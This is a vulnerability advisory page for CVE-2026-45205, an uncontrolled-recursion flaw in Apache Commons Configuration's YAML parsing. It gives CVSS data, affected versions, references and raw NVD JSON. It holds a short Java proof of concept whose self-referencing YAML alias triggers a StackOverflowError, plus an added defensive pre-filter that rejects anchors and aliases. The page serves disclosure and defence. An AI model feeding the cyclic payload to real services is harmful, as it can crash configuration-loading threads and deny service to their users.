Security Vulnerability Report
CVE-2026-45205 CVSS 5.3 MEDIUM

CVE-2026-45205

Published: 2026-05-14 12:16:36
Last Modified: 2026-05-14 21:16:48

Description

Uncontrolled Recursion (CWE-674) vulnerability in Apache Commons Configuration. When processing an untrusted configuration file, Commons Configuration throws a StackOverflowError for YAML input that contains cycles (a node that, via an alias, refers back to itself). Because StackOverflowError is an Error rather than an Exception, it escapes the usual `catch (Exception e)` handlers and can terminate the thread that is loading the configuration, which is the availability impact reflected in the CVSS vector. This issue affects Apache Commons Configuration from 2.2 before 2.15.0. Users are recommended to upgrade to version 2.15.0, which fixes the issue.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No NVD configuration (CPE) data is available yet; the record is still marked "Undergoing Analysis". Affected versions according to the advisory:

Apache Commons Configuration 2.2
Apache Commons Configuration 2.3
Apache Commons Configuration 2.4
Apache Commons Configuration 2.5
Apache Commons Configuration 2.6
Apache Commons Configuration 2.7
Apache Commons Configuration 2.8
Apache Commons Configuration 2.9
Apache Commons Configuration 2.10
Apache Commons Configuration 2.11.0
Apache Commons Configuration 2.11.1
Apache Commons Configuration: all versions before 2.15.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
import org.apache.commons.configuration2.YAMLConfiguration;
import java.io.StringReader;

public class CVE202645205_PoC {
    public static void main(String[] args) {
        try {
            // Create a YAML configuration instance
            YAMLConfiguration config = new YAMLConfiguration();
            // Malicious YAML input with a recursive cycle: the mapping anchored
            // as &cycle contains an alias (*cycle) that points back to itself,
            // so walking the parsed structure never terminates
            String maliciousYaml = "cycle: &cycle\n field: *cycle";
            // Attempt to read the malicious configuration
            config.read(new StringReader(maliciousYaml));
            System.out.println("Exploit failed: StackOverflow not triggered.");
        } catch (StackOverflowError e) {
            // StackOverflowError is an Error, not an Exception, so it needs its own catch
            System.out.println("Exploit successful: StackOverflowError triggered.");
            e.printStackTrace();
        } catch (Exception e) {
            System.out.println("Other error: " + e.getMessage());
        }
    }
}

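The real fix is upgrading to Commons Configuration 2.15.0. For callers that cannot upgrade immediately, the following is an added example (not code from this page or from the Apache Commons project) of a defense-in-depth pre-filter for the scenario described above: a cycle can only be expressed in YAML through an alias, so untrusted input that contains any `&anchor` or `*alias` token is rejected before it reaches YAMLConfiguration. The class name `UntrustedYamlGuard` and its methods are hypothetical; it assumes commons-configuration2 on the classpath and uses only its public `YAMLConfiguration.read(Reader)` and `ConfigurationException`. The two YAML documents in `main` are constructed samples.

```java
import java.io.StringReader;
import org.apache.commons.configuration2.YAMLConfiguration;
import org.apache.commons.configuration2.ex.ConfigurationException;

/**
 * Hypothetical guard (added example, not part of Apache Commons): refuse
 * untrusted YAML that uses anchors or aliases before YAMLConfiguration
 * parses it, so a cyclic document cannot trigger the unbounded recursion
 * present in versions before 2.15.0.
 */
public class UntrustedYamlGuard {

    /**
     * True if the text contains an anchor (&name) or alias (*name) token
     * outside comments and quoted scalars. Deliberately coarse: for
     * untrusted configuration we reject aliases altogether instead of
     * trying to prove that the node graph is acyclic.
     */
    public static boolean usesAnchorsOrAliases(String yaml) {
        boolean inSingle = false;
        boolean inDouble = false;
        char prev = '\n'; // start of input counts as a token boundary
        for (int i = 0; i < yaml.length(); i++) {
            char c = yaml.charAt(i);
            if (inDouble) {
                if (c == '\\' && i + 1 < yaml.length()) {
                    i++;                   // skip the escaped character
                } else if (c == '"') {
                    inDouble = false;
                }
            } else if (inSingle) {
                if (c == '\'') {
                    inSingle = false;      // a doubled '' just closes and reopens
                }
            } else if (c == '#' && Character.isWhitespace(prev)) {
                while (i + 1 < yaml.length() && yaml.charAt(i + 1) != '\n') {
                    i++;                   // a comment runs to end of line
                }
            } else if (c == '"') {
                inDouble = true;
            } else if (c == '\'') {
                inSingle = true;
            } else if ((c == '&' || c == '*')
                    && (Character.isWhitespace(prev) || prev == '[' || prev == '{' || prev == ',')
                    && i + 1 < yaml.length()
                    && !Character.isWhitespace(yaml.charAt(i + 1))) {
                return true;               // an &anchor or *alias token
            }
            prev = c;
        }
        return false;
    }

    /** Parse untrusted YAML into a YAMLConfiguration, failing fast on aliases. */
    public static YAMLConfiguration loadUntrusted(String yaml) throws ConfigurationException {
        if (usesAnchorsOrAliases(yaml)) {
            throw new ConfigurationException("untrusted YAML uses anchors/aliases; rejected");
        }
        YAMLConfiguration config = new YAMLConfiguration();
        config.read(new StringReader(yaml));
        return config;
    }

    public static void main(String[] args) throws ConfigurationException {
        // Constructed samples: the cyclic document from the PoC, and a benign
        // one whose only '&' and '*' sit inside a quoted scalar.
        String cyclic = "cycle: &cycle\n  field: *cycle\n";
        String benign = "server:\n  port: 8080\n  banner: \"not an &anchor or *alias\"\n";

        YAMLConfiguration cfg = loadUntrusted(benign);
        System.out.println("benign loaded, server.port = " + cfg.getInt("server.port"));

        try {
            loadUntrusted(cyclic);
            System.out.println("cyclic document was not rejected");
        } catch (ConfigurationException e) {
            System.out.println("rejected before parsing: " + e.getMessage());
        }
    }
}
```

The trade-off is that this also rejects legitimate uses of aliases such as merge keys (`<<: *defaults`); for configuration that arrives from an untrusted party that is usually acceptable, and it keeps the guard independent of the parser's internals. It does not replace the upgrade: on a fixed version the library itself refuses the cycle.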
References

https://github.com/apache/commons-configuration/pull/634 (fix, [email protected])
https://lists.apache.org/thread/q3q3j10ohcqhs6o0rg1v7kz6kk27vtkk (advisory, [email protected])
http://www.openwall.com/lists/oss-security/2026/05/14/5 (oss-security announcement)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45205", "sourceIdentifier": "[email protected]", "published": "2026-05-14T12:16:35.687", "lastModified": "2026-05-14T21:16:48.047", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Recursion vulnerability in Apache Commons.\n\nWhen processing an untrusted configuration file, Commons Configuration will throw a StackOverflowError for YAML input with cycles.\nThis issue affects Apache Commons: from 2.2 before 2.15.0.\n\nUsers are recommended to upgrade to version 2.15.0, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-674"}]}], "references": [{"url": "https://github.com/apache/commons-configuration/pull/634", "source": "[email protected]"}, {"url": "https://lists.apache.org/thread/q3q3j10ohcqhs6o0rg1v7kz6kk27vtkk", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/14/5", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}